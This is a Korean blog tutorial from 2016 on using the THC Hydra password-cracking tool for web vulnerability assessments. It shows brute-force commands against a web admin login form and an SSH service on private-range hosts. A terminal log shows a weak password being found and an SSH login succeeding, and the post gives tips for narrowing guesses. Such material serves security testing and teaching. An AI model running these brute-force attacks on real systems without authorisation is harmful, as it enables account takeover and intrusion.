홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 웹취약점점검 도구로서의 THC Hydra 사용법
칼리리눅스(Kali Linux) 운영체제에서는 다음과 같이 간단하게 설치할 수 있다. apt-get install hydra
웹 취약점 분석에서 가장 많이 사용되는 용례는 다음과 같다.
(흔하게 사용되는 ID 목록( HTTP POST 방식의 로그인 공격hydra 192.168.189.221 http-form-post "/admin/login.jsp:user=^USER^&pass=^PASS^:Wrong ID/PASSWORD" -L weakuser.txt -P weakpass.txt [ ↑ "http-form-post"로 취약한 관리자 계정 존재여부 확인 ]
HTTPS인 경우에는
SSH에 대한 무작위대입 공격hydra -L weakuser.txt -P weakpass.txt 192.168.189.221 ssh [ ↑ "ssh" 공격으로 취약한 서버계정 존재여부 확인 ] 웹서버에 ssh를 통해 접속이 가능한 경우에는 무작위대입공격(brute-force attack)을 수행하여 취약한 계정이 있는 지 검검할 수 있다 (실제 웹취약점 분석에서는 /etc/passwd 파일을 열람하여 확인하는 것이 빠르다). root@kali:~# hydra 192.168.189.224 ssh -L weakuser.txt -P weakpass.txt Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-11-07 19:09:22 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 64 tasks, 11880 login tries (l:22/p:540), ~11 tries per task [DATA] attacking service ssh on port 22 [STATUS] 481.00 tries/min, 481 tries in 00:01h, 11399 todo in 00:24h, 16 active [STATUS] 502.00 tries/min, 1506 tries in 00:03h, 10374 todo in 00:21h, 16 active [22][ssh] host: 192.168.189.224 login: test password: s3cret [STATUS] 489.00 tries/min, 3423 tries in 00:07h, 8457 todo in 00:18h, 16 active ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session. root@kali:~# ssh test@192.168.189.224 The authenticity of host '192.168.189.224 (192.168.189.224)' can't be established. ECDSA key fingerprint is SHA256:lvHMq2Dr6RuZYIQhZkWr7LC7PPhIT4kU32hT8Z+jXbo. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.189.224' (ECDSA) to the list of known hosts. test@192.168.189.224's password: Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64) test@server:~$ [ ↑ 리눅스 서버의 SSH에 대한 무작위대입 공격 사례]
위의 ssh 무작위대입 공격 사례는 THC Hydra는 표적 서버를 대상으로 온라인에서 무작위대입 공격을 수행하므로 네트워크+서버응답 만큼의 시간이 걸린다. 이 때문에 속도가 매우 느리다. 따라서 미리 계정(ID)을 파악할 수 있다면 좀 더 빠르게 공격을 수행할 수 있다. 또한 비밀번호 생성규칙을 알아낼 수 있다면 비밀번호의 범위를 좁힐 수 있으므로 시간단축에 도움이 된다.
웹취약점분석에서는 -- 관리자의 승인이 있을 경우에는 -- 서버의 [처음 작성한 날: 2016.11.07] [마지막으로 고친 날: 2016.11.11] < 이전 글 : SQL 인젝션 공격도구 sqlmap의 간단한 사용법 (2016.11.07) > 다음 글 : 웹취약점 분석 도구로서의 cURL (2016.11.07) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |